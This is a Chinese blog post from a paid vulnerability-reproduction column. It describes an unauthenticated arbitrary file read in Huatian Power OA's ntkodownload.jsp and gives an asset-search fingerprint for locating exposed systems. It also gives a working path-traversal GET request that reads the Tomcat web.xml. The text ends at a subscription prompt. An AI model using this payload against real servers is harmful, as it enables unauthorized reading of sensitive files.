华天动力OA ntkodownload.jsp 任意文件读取漏洞（含批量验证poc）

今天晚上早睡觉

已于 2024-04-07 13:59:14 修改

阅读量191

点赞数

分类专栏：漏洞复现文章标签： web安全

于 2024-04-07 13:58:44 首次发布

本文链接：https://blog.csdn.net/weixin_43567873/article/details/137461783

版权

漏洞复现专栏收录该内容

364 篇文章 168 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文介绍了华天动力OA系统中ntkodownload.jsp存在的任意文件读取漏洞，该漏洞可能导致攻击者未授权访问服务器内部敏感文件。详细阐述了漏洞的原理，并提供了复现步骤及PoC。

摘要由CSDN通过智能技术生成

漏洞简介

华天动力OA是一款将先进的管理思想、管理模式和软件技术、网络技术相结合，为用户提供了低成本、高效能的协同办公和管理平台。

华天动力OA ntkodownload.jsp接口处存在任意文件读取漏洞，未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件，使系统处于极不安全的状态。

漏洞规则

app = "华天动力-OA8000"

漏洞复现

读取tomcat配置文件


GET /OAapp/jsp/trace/ntkodownload.jsp?filename=../../../../../../../htoa/Tomcat/webapps/ROOT/WEB-INF/web.xml HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept-Encoding: gzip, deflate
Accept: *

了解本专栏